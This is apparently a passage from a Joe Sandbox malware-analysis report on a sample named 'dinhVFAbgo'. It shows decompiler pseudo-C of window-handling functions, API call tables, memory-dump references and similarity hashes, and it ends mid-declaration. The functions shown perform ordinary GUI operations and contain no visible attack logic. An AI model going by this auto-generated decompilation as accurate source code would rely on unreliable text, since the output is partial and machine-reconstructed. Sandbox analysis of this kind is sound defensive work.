									L18:
									_t129 = E00CA9583(__eflags, 0xa0);
									 *(_t237 - 0x84) = _t129;
									 *(_t237 - 4) =  *(_t237 - 4) & 0x00000000;
									__eflags = _t129;
									if(__eflags == 0) {
										_t183 = 0;
										__eflags = 0;
									} else {
										_t183 = E00D0917C(_t183, _t129, _t221, _t230, __eflags);
									}
									 *(_t237 - 4) =  *(_t237 - 4) | 0xffffffff;
									 *0xe17a64( *(_t237 - 0x7c), 1);
									_t132 =  *((intOrPtr*)( *((intOrPtr*)( *_t183 + 0x164))))();
									__eflags = _t132;
									if(_t132 != 0) {
										SendMessageA( *(_t183 + 0x20), 0x401, 0, 0);
										_t230 =  *(_t237 - 0x78);
										 *(_t221 + 0x3c) = _t183;
										L24:
										E00DDFBE0(_t221, _t237 - 0x40, 0, 0x30);
										_t189 =  *((intOrPtr*)(_t237 - 0x74));
										 *(_t237 - 0x90) =  *(_t189 + 0x14);
										 *((intOrPtr*)(_t237 - 0x8c)) =  *((intOrPtr*)(_t189 + 0x18));
										ScreenToClient( *(_t230 + 0x20), _t237 - 0x90);
										E00DDFBE0(_t221, _t237 - 0x70, 0, 0x30);
										_t240 = _t238 + 0x18;
										 *(_t237 - 0x70) = 0x2c;
										 *0xe17a64( *(_t237 - 0x90),  *((intOrPtr*)(_t237 - 0x8c)), _t237 - 0x70);
										_t229 =  *((intOrPtr*)( *((intOrPtr*)( *_t230 + 0x74))))();
										_t145 =  *(_t237 - 0x78);
										 *(_t237 - 0x7c) = _t229;
										_t51 = _t229 + 1; // 0x1
										asm("sbb ecx, ecx");
										_t195 =  ~_t51 & _t145;
										 *(_t237 - 0x84) = _t195;
										__eflags =  *(_t221 + 0x44) - _t229;
										if( *(_t221 + 0x44) != _t229) {
											L30:
											__eflags = _t229 - 0xffffffff;
											if(_t229 == 0xffffffff) {
												SendMessageA( *(_t183 + 0x20), 0x401, 0, 0);
												L39:
												E00D09C67(_t183,  *((intOrPtr*)(_t237 - 0x74)));
												_t196 =  *(_t221 + 0x48);
												_t149 = _t196;
												__eflags = _t196;
												if(_t196 != 0) {
													__eflags =  *_t196 - 0x2c;
													if( *_t196 >= 0x2c) {
														SendMessageA( *(_t183 + 0x20), 0x405, 0, _t196);
														_t149 =  *(_t221 + 0x48);
													}
												}
												 *(_t221 + 0x40) =  *(_t237 - 0x84);
												 *(_t221 + 0x44) = _t229;
												__eflags = _t149;
												if(__eflags == 0) {
													 *(_t221 + 0x48) = E00CA9583(__eflags, 0x30);
													E00DDFBE0(_t221, _t152, 0, 0x30);
													_t149 =  *(_t221 + 0x48);
													_t240 = _t240 + 0x10;
												}
												_t198 = 0xc;
												_t229 = _t237 - 0x70;
												memcpy(_t149, _t229, _t198 << 2);
												_t221 = _t229 + _t198 + _t198;
												L45:
												__eflags =  *((intOrPtr*)(_t237 - 0x4c)) - 0xffffffff;
												if( *((intOrPtr*)(_t237 - 0x4c)) != 0xffffffff) {
													__eflags =  *(_t237 - 0x50);
													if( *(_t237 - 0x50) == 0) {
														E00DE2153( *((intOrPtr*)(_t237 - 0x4c)));
													}
												}
												goto L76;
											}
											_t201 = 0xc;
											_t155 = memcpy(_t237 - 0x40, _t237 - 0x70, _t201 << 2);
											_t240 = _t240 + 0xc;
											_t204 =  *(_t237 - 0x6c) & 0x3fffffff;
											__eflags =  *(_t155 + 0x60) & 0x00000400;
											 *(_t237 - 0x3c) = _t204;
											if(( *(_t155 + 0x60) & 0x00000400) != 0) {
												_t206 = _t204 | 0x00000020;
												__eflags = _t206;
												 *(_t237 - 0x3c) = _t206;
											}
											SendMessageA( *(_t183 + 0x20), 0x404, 0, _t237 - 0x40);
											__eflags =  *(_t237 - 0x6c) & 0x40000000;
											if(__eflags != 0) {
												L35:
												SendMessageA( *(_t183 + 0x20), 0x401, 1, 0);
												_t159 =  *(_t237 - 0x78);
												__eflags =  *(_t159 + 0x60) & 0x00000400;
												if(( *(_t159 + 0x60) & 0x00000400) != 0) {
													SendMessageA( *(_t183 + 0x20), 0x411, 1, _t237 - 0x40);
												}
												SetWindowPos( *(_t183 + 0x20), 0, 0, 0, 0, 0, 0x213);
												goto L38;
											} else {
												_t163 = E00CB3101( *(_t237 - 0x78), _t218, __eflags);
												__eflags = _t163;
												if(_t163 == 0) {
													L38:
													_t229 =  *(_t237 - 0x7c);
													_t221 =  *(_t237 - 0x80);
													goto L39;
												}
												goto L35;
											}
										}
										__eflags =  *(_t221 + 0x40) - _t195;
										if( *(_t221 + 0x40) != _t195) {
											goto L30;
										}
										__eflags =  *(_t145 + 0x60) & 0x00000400;
										if(( *(_t145 + 0x60) & 0x00000400) == 0) {
											__eflags = _t229 - 0xffffffff;
											if(_t229 != 0xffffffff) {
												E00D09C67(_t183,  *((intOrPtr*)(_t237 - 0x74)));
											}
										} else {
											GetCursorPos(_t237 - 0x88);
											SendMessageA( *(_t183 + 0x20), 0x412, 0, ( *(_t237 - 0x84) & 0x0000ffff) << 0x00000010 |  *(_t237 - 0x88) & 0x0000ffff);
										}
										goto L45;
									} else {
										_t229 =  *( *_t183 + 4);
										 *0xe17a64(1);
										 *( *( *_t183 + 4))();
										goto L76;
									}
								}
								_t174 = E00CB29F1(_t183);
								__eflags = _t174 -  *(_t237 - 0x7c);
								if(_t174 ==  *(_t237 - 0x7c)) {
									goto L24;
								} else {
									 *0xe17a64();
									 *((intOrPtr*)( *((intOrPtr*)( *_t183 + 0x60))))();
									_t230 =  *( *_t183 + 4);
									 *0xe17a64(1);
									 *( *( *_t183 + 4))();
									_t21 = _t221 + 0x3c;
									 *_t21 =  *(_t221 + 0x3c) & 0x00000000;
									__eflags =  *_t21;
									goto L18;
								}
							} else {
								if(_t127 == 0) {
									 *(_t221 + 0x40) =  *(_t221 + 0x40) & _t127;
									 *(_t221 + 0x44) =  *(_t221 + 0x44) | 0xffffffff;
								}
								goto L76;
							}
						}
					}
				} else {
					L50:
					__eflags =  *(_t183 + 0x60) & 0x00000401;
					if(( *(_t183 + 0x60) & 0x00000401) == 0) {
						L76:
						return E00DDD50E(_t183, _t221, _t229);
					}
					_push( *_t116);
					while(1) {
						_t119 = E00CB277F(_t183, _t184, _t218);
						__eflags = _t119;
						if(_t119 == 0) {
							break;
						}
						__eflags = _t119 - _t183;
						if(_t119 == _t183) {
							L57:
							__eflags = _t229 - 0x100;
							if(_t229 < 0x100) {
								L59:
								__eflags = _t229 - 0x104 - 3;
								if(_t229 - 0x104 > 3) {
									_t221 = 0;
									__eflags = 0;
								}
								L61:
								__eflags =  *(_t183 + 0x60) & 0x00000400;
								if(( *(_t183 + 0x60) & 0x00000400) != 0) {
									goto L76;
								}
								__eflags = _t221;
								if(__eflags != 0) {
									L75:
									E00CB1D54(_t184, _t229, __eflags, _t221);
									goto L76;
								}
								__eflags = _t229 - 0x201;
								if(__eflags == 0) {
									goto L75;
								}
								__eflags = _t229 - 0x203;
								if(__eflags == 0) {
									goto L75;
								}
								__eflags = _t229 - 0x204;
								if(__eflags == 0) {
									goto L75;
								}
								__eflags = _t229 - 0x206;
								if(__eflags == 0) {
									goto L75;
								}
								__eflags = _t229 - 0x207;
								if(__eflags == 0) {
									goto L75;
								}
								__eflags = _t229 - 0x209;
								if(__eflags == 0) {
									goto L75;
								}
								__eflags = _t229 - 0xa1;
								if(__eflags == 0) {
									goto L75;
								}
								__eflags = _t229 - 0xa3;
								if(__eflags == 0) {
									goto L75;
								}
								__eflags = _t229 - 0xa4;
								if(__eflags == 0) {
									goto L75;
								}
								__eflags = _t229 - 0xa6;
								if(__eflags == 0) {
									goto L75;
								}
								__eflags = _t229 - 0xa7;
								if(__eflags == 0) {
									goto L75;
								}
								__eflags = _t229 - 0xa9;
								if(__eflags != 0) {
									goto L76;
								}
								goto L75;
							}
							__eflags = _t229 - 0x109;
							if(_t229 <= 0x109) {
								goto L61;
							}
							goto L59;
						}
						__eflags =  *(_t119 + 0x60) & 0x00000401;
						if(( *(_t119 + 0x60) & 0x00000401) != 0) {
							goto L76;
						}
						_push(GetParent( *(_t119 + 0x20)));
					}
					__eflags = _t119 - _t183;
					if(_t119 != _t183) {
						goto L76;
					}
					goto L57;
				}
			}

0x00d09483
0x00d09483
0x00d09483
0x00d0948d
0x00d09492
0x00d09494
0x00d09497
0x00d0949c
0x00d0949d
0x00d094a0
0x00d094a9
0x00d094d9
0x00d0982c
0x00d0982c
0x00000000
0x00d094f0
0x00d094f2
0x00d094f8
0x00d094fb
0x00000000
0x00d09501
0x00d09506
0x00d0950b
0x00d0950e
0x00d09525
0x00d09525
0x00d0952c
0x00000000
0x00000000
0x00d09512
0x00d09519
0x00000000
0x00d0951b
0x00d09524
0x00000000
0x00d09524
0x00d09519
0x00d09530
0x00d09546
0x00d0954b
0x00d09553
0x00d09556
0x00d09558
0x00d09592
0x00d09597
0x00d0959d
0x00d095a3
0x00d095a7
0x00d095a9
0x00d095b6
0x00d095b6
0x00d095ab
0x00d095b2
0x00d095b2
0x00d095ba
0x00d095cb
0x00d095d3
0x00d095d5
0x00d095d7
0x00d095fd
0x00d09603
0x00d09606
0x00d09609
0x00d09611
0x00d09616
0x00d09622
0x00d09632
0x00d09638
0x00d09646
0x00d0964d
0x00d09650
0x00d0966c
0x00d09677
0x00d09679
0x00d0967c
0x00d0967f
0x00d09684
0x00d09686
0x00d09688
0x00d0968e
0x00d09691
0x00d096ef
0x00d096ef
0x00d096f2
0x00d09821
0x00d09793
0x00d09798
0x00d0979d
0x00d097a0
0x00d097a2
0x00d097a4
0x00d097a6
0x00d097a9
0x00d097b6
0x00d097bc
0x00d097bc
0x00d097a9
0x00d097c5
0x00d097c8
0x00d097cb
0x00d097cd
0x00d097db
0x00d097de
0x00d097e3
0x00d097e6
0x00d097e6
0x00d097eb
0x00d097ec
0x00d097f1
0x00d097f1
0x00d097f3
0x00d097f3
0x00d097f7
0x00d097fd
0x00d09801
0x00d0980a
0x00d0980f
0x00d09801
0x00000000
0x00d097f7
0x00d096fa
0x00d09701
0x00d09701
0x00d09706
0x00d0970c
0x00d09713
0x00d09716
0x00d09718
0x00d09718
0x00d0971b
0x00d0971b
0x00d0972d
0x00d09733
0x00d0973a
0x00d09748
0x00d09755
0x00d0975b
0x00d0975e
0x00d09765
0x00d09774
0x00d09774
0x00d09787
0x00000000
0x00d0973c
0x00d0973f
0x00d09744
0x00d09746
0x00d0978d
0x00d0978d
0x00d09790
0x00000000
0x00d09790
0x00000000
0x00d09746
0x00d0973a
0x00d09693
0x00d09696
0x00000000
0x00000000
0x00d09698
0x00d0969f
0x00d096d7
0x00d096da
0x00d096e5
0x00d096e5
0x00d096a1
0x00d096a8
0x00d096cc
0x00d096cc
0x00000000
0x00d095d9
0x00d095dd
0x00d095e2
0x00d095ea
0x00000000
0x00d095ea
0x00d095d7
0x00d0955c
0x00d09561
0x00d09564
0x00000000
0x00d0956a
0x00d09571
0x00d09579
0x00d0957f
0x00d09584
0x00d0958c
0x00d0958e
0x00d0958e
0x00d0958e
0x00000000
0x00d0958e
0x00d09532
0x00d09534
0x00d0953a
0x00d0953d
0x00d0953d
0x00000000
0x00d09534
0x00d09530
0x00d094fb
0x00d0982f
0x00d0982f
0x00d0982f
0x00d09836
0x00d098fc
0x00d09901
0x00d09901
0x00d0983c
0x00d0985b
0x00d0985b
0x00d09860
0x00d09862
0x00000000
0x00000000
0x00d09840
0x00d09842
0x00d0986c
0x00d0986c
0x00d09872
0x00d0987c
0x00d09882
0x00d09885
0x00d09887
0x00d09887
0x00d09887
0x00d09889
0x00d09889
0x00d09890
0x00000000
0x00000000
0x00d09892
0x00d09894
0x00d098f6
0x00d098f7
0x00000000
0x00d098f7
0x00d09896
0x00d0989c
0x00000000
0x00000000
0x00d0989e
0x00d098a4
0x00000000
0x00000000
0x00d098a6
0x00d098ac
0x00000000
0x00000000
0x00d098ae
0x00d098b4
0x00000000
0x00000000
0x00d098b6
0x00d098bc
0x00000000
0x00000000
0x00d098be
0x00d098c4
0x00000000
0x00000000
0x00d098c6
0x00d098cc
0x00000000
0x00000000
0x00d098ce
0x00d098d4
0x00000000
0x00000000
0x00d098d6
0x00d098dc
0x00000000
0x00000000
0x00d098de
0x00d098e4
0x00000000
0x00000000
0x00d098e6
0x00d098ec
0x00000000
0x00000000
0x00d098ee
0x00d098f4
0x00000000
0x00000000
0x00000000
0x00d098f4
0x00d09874
0x00d0987a
0x00000000
0x00000000
0x00000000
0x00d0987a
0x00d09844
0x00d0984b
0x00000000
0x00000000
0x00d0985a
0x00d0985a
0x00d09864
0x00d09866
0x00000000
0x00000000
0x00000000
0x00d09866

APIs

__EH_prolog3_GS.LIBCMT ref: 00D0948D
GetKeyState.USER32 ref: 00D094D0
GetKeyState.USER32 ref: 00D094E1
GetKeyState.USER32 ref: 00D094F2
GetParent.USER32(?), ref: 00D0951E
SendMessageA.USER32(?,00000401,00000000,00000000), ref: 00D095FD
ScreenToClient.USER32 ref: 00D09638
GetCursorPos.USER32(?), ref: 00D096A8
SendMessageA.USER32(?,00000412,00000000,?), ref: 00D096CC
SendMessageA.USER32(?,00000404,00000000,?), ref: 00D0972D
SendMessageA.USER32(?,00000401,00000001,00000000), ref: 00D09755
SendMessageA.USER32(?,00000411,00000001,?), ref: 00D09774
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00D09787
SendMessageA.USER32(?,00000405,00000000,?), ref: 00D097B6
SendMessageA.USER32(?,00000401,00000000,00000000), ref: 00D09821
GetParent.USER32(?), ref: 00D09854

Strings

,, xrefs: 00D09650

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$State$Parent$ClientCursorH_prolog3_ScreenWindow
String ID: ,
API String ID: 2191884919-3772416878
Opcode ID: c671f5ae32331570a209758cca256a005d884b635ad6c7fe6e0d7a237839d18c
Instruction ID: 5e62228827eb35e9f4adafa8684fd58ad20e7639abd049f6323f27273a828e4b
Opcode Fuzzy Hash: c671f5ae32331570a209758cca256a005d884b635ad6c7fe6e0d7a237839d18c
Instruction Fuzzy Hash: 23C1DF31A003289FDF249F66CCA9BADB775BF05710F144169EA99B72E2DB709D40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CF4F06 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 305
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00CF4F06(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct HWND__* _v20;
				signed int _v24;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t106;
				int _t110;
				signed int _t111;
				void* _t121;
				int _t122;
				signed int _t130;
				int _t131;
				int _t132;
				signed int _t138;
				signed int _t144;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t156;
				intOrPtr _t162;
				signed int _t167;
				void* _t175;
				intOrPtr* _t182;
				signed int _t188;
				signed int _t207;
				struct HWND__* _t212;
				signed int _t223;
				signed int _t224;
				signed int _t232;
				void* _t237;
				void* _t242;

				_t222 = __edx;
				_t183 = __ecx;
				_t223 = 0;
				_t182 = __ecx;
				_t242 =  *0xe8738c - _t223; // 0x0
				if(_t242 == 0 ||  *((intOrPtr*)(__ecx + 0xb78)) != 0) {
					__eflags =  *((intOrPtr*)(_t182 + 0x174)) - _t223;
					if( *((intOrPtr*)(_t182 + 0x174)) != _t223) {
						goto L10;
					}
					__eflags =  *(_t182 + 0xbec) - 0xffffffff;
					if( *(_t182 + 0xbec) != 0xffffffff) {
						ReleaseCapture();
						_t106 =  *(_t182 + 0xd04);
						__eflags = _t106;
						if(__eflags != 0) {
							E00CB277F(_t182, _t183, _t222, SetCapture( *(_t106 + 0x20)));
							 *(_t182 + 0xd04) = _t223;
						}
						 *0xe17a64(_a8, _a12);
						 *(_t182 + 0xbf0) =  *( *( *_t182 + 0x390))();
						_t110 = E00CF13CC(_t182, _t182, _t223,  *( *_t182 + 0x390), __eflags,  *(_t182 + 0xbec));
						_t224 = _t110;
						__eflags = _t224;
						if(_t224 == 0) {
							L47:
							return _t110;
						} else {
							_t111 = E00CACB0B(_t224, 0xe2fb70);
							_v8 = _v8 & 0x00000000;
							_t188 =  *(_t182 + 0xbec);
							_v24 = _t111;
							_v16 =  *(_t224 + 0x24) & 0xfffdffff;
							__eflags = _t188 -  *(_t182 + 0xbf0);
							if(_t188 ==  *(_t182 + 0xbf0)) {
								_v20 = _t188;
								 *0xe17a64(_a8, _a12);
								_t153 =  *( *( *_t182 + 0x390))();
								_t212 = _v20;
								__eflags = _t153 - _t212;
								if(_t153 == _t212) {
									E00CF9A1E(_t182, _t212);
									__eflags =  *(_t224 + 0x24) & 0x00040000;
									if(( *(_t224 + 0x24) & 0x00040000) == 0) {
										__eflags =  *(_t224 + 0x24) & 0x00000002;
										_v8 =  *((intOrPtr*)(_t224 + 0x20));
										if(( *(_t224 + 0x24) & 0x00000002) != 0) {
											_t155 = _v16;
											__eflags = _t155 & 0x00100000;
											if((_t155 & 0x00100000) != 0) {
												_t155 = _t155 & 0xffefffff;
												__eflags = _t155;
											}
											_t156 = _t155 ^ 0x00010000;
											__eflags = _t156;
											_v16 = _t156;
										}
									}
								}
							}
							__eflags =  *0xe87384;
							if( *0xe87384 == 0) {
								SendMessageA( *(E00CB29F1(_t182) + 0x20), 0x362, 0xe001, 0);
							}
							 *(_t182 + 0xbec) =  *(_t182 + 0xbec) | 0xffffffff;
							 *(_t182 + 0xbf0) =  *(_t182 + 0xbf0) | 0xffffffff;
							_v12 =  *(_t182 + 0xbec);
							_v20 =  *(_t182 + 0x20);
							 *0xe17a64();
							 *((intOrPtr*)( *((intOrPtr*)( *_t182 + 0x364))))();
							 *0xe17a64(_a8, _a12);
							_t121 =  *( *( *_t182 + 0x390))();
							__eflags = _t121 - _v12;
							if(_t121 != _v12) {
								L35:
								_t230 = _v20;
								_t122 = IsWindow(_t230);
								__eflags = _t122;
								if(_t122 != 0) {
									_t131 = IsIconic(_t230);
									__eflags = _t131;
									if(_t131 == 0) {
										_t132 = IsZoomed(_t230);
										__eflags = _t132;
										if(_t132 != 0) {
											_t230 =  *( *_t224 + 0x24);
											 *0xe17a64();
											 *( *( *_t224 + 0x24))();
										}
									}
								}
								goto L39;
							} else {
								 *0xe17a64(_t224);
								_t138 =  *((intOrPtr*)( *((intOrPtr*)( *_t182 + 0x3e8))))();
								__eflags = _t138;
								if(_t138 != 0) {
									goto L35;
								}
								_t232 = _v8;
								__eflags = _t232;
								if(_t232 == 0) {
									goto L35;
								}
								__eflags = _t232 - 0xffffffff;
								if(_t232 == 0xffffffff) {
									goto L35;
								}
								E00CF1BC5(_t182, _t182, _v12);
								UpdateWindow( *(_t182 + 0x20));
								E00D7CF0F(0xe873e4, _t222, _t232);
								_t230 =  *( *_t224 + 0x24);
								 *0xe17a64();
								_t144 =  *( *( *_t224 + 0x24))();
								__eflags = _t144;
								if(_t144 != 0) {
									L39:
									_t110 = IsWindow(_v20);
									__eflags = _t110;
									if(_t110 == 0) {
										goto L47;
									}
									_t223 = _v12;
									__eflags = _t223 -  *((intOrPtr*)(_t182 + 0xc48));
									if(_t223 >=  *((intOrPtr*)(_t182 + 0xc48))) {
										goto L47;
									}
									__eflags = _v24;
									if(__eflags == 0) {
										_t230 =  *( *_t182 + 0x374);
										 *0xe17a64(_t223, _v16);
										 *( *( *_t182 + 0x374))();
									} else {
										_t130 = E00CF13CC(_t182, _t182, _t223, _t230, __eflags, _t223);
										__eflags = _t130;
										if(_t130 != 0) {
											 *(_t130 + 0x24) =  *(_t130 + 0x24) & 0xfffdffff;
										}
									}
									E00CF9A1E(_t182, _t223);
									E00CF1BC5(_t182, _t182, _t223);
									UpdateWindow( *(_t182 + 0x20));
									_push(_a12);
									_push(_a8);
									_push(0);
									L46:
									 *(_t182 + 0xcfc) =  *(_t182 + 0xcfc) | 0xffffffff;
									_t102 = _t182 + 0xd00;
									 *_t102 =  *(_t182 + 0xd00) | 0xffffffff;
									__eflags =  *_t102;
									return L00CF546B(_t182, _t182, _t222, _t223, _t230,  *_t102);
								}
								_t207 =  *0xe8878c; // 0x0
								_t230 = _v8;
								__eflags = _t207;
								if(__eflags == 0) {
									L34:
									SendMessageA( *(E00CB29F1(_t182) + 0x20), 0x111, _t230, 0);
									goto L39;
								}
								_t147 = E00D4B4D5(_t207, __eflags, _t230);
								__eflags = _t147;
								if(_t147 != 0) {
									goto L39;
								}
								goto L34;
							}
						}
					}
					_t230 =  *( *_t182 + 0x390);
					 *0xe17a64(_a8, _a12);
					_t110 =  *( *( *_t182 + 0x390))();
					__eflags = _t110 - 0xffffffff;
					if(_t110 != 0xffffffff) {
						goto L47;
					}
					E00CE43EA(_t182, _t222, _a4, _a8, _a12);
					_push(_a12);
					_push(_a8);
					_push(_t223);
					goto L46;
				} else {
					if( *((intOrPtr*)(__ecx + 0xba4)) != 0) {
						_t162 =  *((intOrPtr*)(__ecx + 0xd0c));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t237 = _a8 - _v40;
						if(_t237 >= 5) {
							_t175 = E00DEC8A6(__edx,  *((intOrPtr*)(_t162 + 0x5c)) - _a8);
							_pop(_t183);
							if(_t175 > 6) {
								 *0xe17a64(_t237);
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0xd0c)))) + 0x34))))();
								 *0xe17a64();
								_t183 = __ecx;
								 *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x20c))))();
							}
						}
						SetRectEmpty(_t182 + 0xcdc);
						 *((intOrPtr*)(_t182 + 0xd0c)) = 0;
						 *((intOrPtr*)(_t182 + 0xba4)) = 0;
						RedrawWindow( *(_t182 + 0x20), 0, 0, 0x505);
						ReleaseCapture();
						_t167 =  *(_t182 + 0xd04);
						if(_t167 != 0) {
							E00CB277F(_t182, _t183, _t222, SetCapture( *(_t167 + 0x20)));
							 *(_t182 + 0xd04) = 0;
						}
						 *0xe17a64(1);
						 *((intOrPtr*)( *((intOrPtr*)( *_t182 + 0x2d4))))();
					}
					_t183 = _t182;
					L10:
					return E00CE43EA(_t183, _t222, _a4, _a8, _a12);
				}
			}

0x00cf4f06
0x00cf4f06
0x00cf4f0f
0x00cf4f11
0x00cf4f13
0x00cf4f19
0x00cf500b
0x00cf5011
0x00000000
0x00000000
0x00cf5013
0x00cf501a
0x00cf505b
0x00cf5061
0x00cf5067
0x00cf5069
0x00cf5075
0x00cf507a
0x00cf507a
0x00cf5090
0x00cf50a2
0x00cf50a8
0x00cf50ad
0x00cf50af
0x00cf50b1
0x00cf52f9
0x00cf52f9
0x00cf50b7
0x00cf50be
0x00cf50c3
0x00cf50c7
0x00cf50cd
0x00cf50d8
0x00cf50db
0x00cf50e1
0x00cf50f5
0x00cf50f8
0x00cf5100
0x00cf5102
0x00cf5105
0x00cf5107
0x00cf510c
0x00cf5111
0x00cf5118
0x00cf511a
0x00cf5121
0x00cf5124
0x00cf5126
0x00cf5129
0x00cf512e
0x00cf5130
0x00cf5130
0x00cf5130
0x00cf5135
0x00cf5135
0x00cf513a
0x00cf513a
0x00cf5124
0x00cf5118
0x00cf5107
0x00cf513d
0x00cf5144
0x00cf515c
0x00cf515c
0x00cf5168
0x00cf516f
0x00cf5176
0x00cf517c
0x00cf5189
0x00cf5191
0x00cf51a3
0x00cf51ab
0x00cf51ad
0x00cf51b0
0x00cf523f
0x00cf523f
0x00cf5243
0x00cf5249
0x00cf524b
0x00cf524e
0x00cf5254
0x00cf5256
0x00cf5259
0x00cf525f
0x00cf5261
0x00cf5265
0x00cf526a
0x00cf5272
0x00cf5272
0x00cf5261
0x00cf5256
0x00000000
0x00cf51b6
0x00cf51c1
0x00cf51c9
0x00cf51cb
0x00cf51cd
0x00000000
0x00000000
0x00cf51cf
0x00cf51d2
0x00cf51d4
0x00000000
0x00000000
0x00cf51d6
0x00cf51d9
0x00000000
0x00000000
0x00cf51e0
0x00cf51e8
0x00cf51f4
0x00cf51fb
0x00cf5200
0x00cf5208
0x00cf520a
0x00cf520c
0x00cf5274
0x00cf5277
0x00cf527d
0x00cf527f
0x00000000
0x00000000
0x00cf5281
0x00cf5284
0x00cf528a
0x00000000
0x00000000
0x00cf528c
0x00cf5290
0x00cf52ad
0x00cf52b5
0x00cf52bd
0x00cf5292
0x00cf5295
0x00cf529a
0x00cf529c
0x00cf529e
0x00cf529e
0x00cf529c
0x00cf52c2
0x00cf52ca
0x00cf52d2
0x00cf52d8
0x00cf52db
0x00cf52de
0x00cf52e0
0x00cf52e0
0x00cf52e9
0x00cf52e9
0x00cf52e9
0x00000000
0x00cf52f0
0x00cf520e
0x00cf5214
0x00cf5217
0x00cf5219
0x00cf5225
0x00cf5237
0x00000000
0x00cf5237
0x00cf521c
0x00cf5221
0x00cf5223
0x00000000
0x00000000
0x00000000
0x00cf5223
0x00cf51b0
0x00cf50b1
0x00cf5024
0x00cf502c
0x00cf5034
0x00cf5036
0x00cf5039
0x00000000
0x00000000
0x00cf504a
0x00cf504f
0x00cf5052
0x00cf5055
0x00000000
0x00cf4f2b
0x00cf4f31
0x00cf4f37
0x00cf4f43
0x00cf4f44
0x00cf4f45
0x00cf4f46
0x00cf4f4a
0x00cf4f50
0x00cf4f59
0x00cf4f5e
0x00cf4f62
0x00cf4f72
0x00cf4f7a
0x00cf4f86
0x00cf4f8c
0x00cf4f8e
0x00cf4f8e
0x00cf4f62
0x00cf4f97
0x00cf4fa9
0x00cf4faf
0x00cf4fb5
0x00cf4fbb
0x00cf4fc1
0x00cf4fc9
0x00cf4fd5
0x00cf4fda
0x00cf4fda
0x00cf4fec
0x00cf4ff4
0x00cf4ff4
0x00cf4ff6
0x00cf4ff8
0x00000000
0x00cf5001

APIs

SetRectEmpty.USER32(?), ref: 00CF4F97
RedrawWindow.USER32(?,00000000,00000000,00000505,?,?), ref: 00CF4FB5
ReleaseCapture.USER32(?,?), ref: 00CF4FBB
SetCapture.USER32(?,?,?), ref: 00CF4FCE
ReleaseCapture.USER32 ref: 00CF505B
SetCapture.USER32(?), ref: 00CF506E
SendMessageA.USER32(?,00000362,0000E001,00000000), ref: 00CF515C
UpdateWindow.USER32(?), ref: 00CF51E8
SendMessageA.USER32(?,00000111,00000000,00000000), ref: 00CF5237
IsWindow.USER32(?), ref: 00CF5243
IsIconic.USER32 ref: 00CF524E
IsZoomed.USER32(?), ref: 00CF5259
IsWindow.USER32(?), ref: 00CF5277
UpdateWindow.USER32(?), ref: 00CF52D2

Strings

, xrefs: 00CF51EF

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$Capture$MessageReleaseSendUpdate$EmptyIconicRectRedrawZoomed
String ID:
API String ID: 2500574155-2740779761
Opcode ID: 00e600180af361b828938c53292ad6b5930a21fc102ce2061c3bf79f193496e5
Instruction ID: a39eb092c9a2e0fa4b4326873b2b6e22752b0966e0b0afbe2753e3a67fde629f
Opcode Fuzzy Hash: 00e600180af361b828938c53292ad6b5930a21fc102ce2061c3bf79f193496e5
Instruction Fuzzy Hash: 34C173316006159FCF159F65CC84AAD3BB5BF48710F0442B9FE29AB2A1CB309A04DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D1DF Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 439
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00D0D1DF(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, int _a12, intOrPtr _a16, intOrPtr _a20, int _a24, signed int _a28, signed int _a32, signed int _a36) {
				signed int _v4;
				signed long long _v8;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int _v28;
				char _v32;
				signed char _v36;
				signed long long _v40;
				struct HDC__* _v52;
				char _v56;
				int _v60;
				int _v64;
				intOrPtr _v68;
				signed int _v72;
				void* _v76;
				int _v80;
				int _v84;
				void* _t162;
				struct HDC__* _t170;
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed char _t179;
				void* _t183;
				struct HDC__* _t185;
				signed int _t188;
				signed char _t196;
				int _t202;
				signed int _t205;
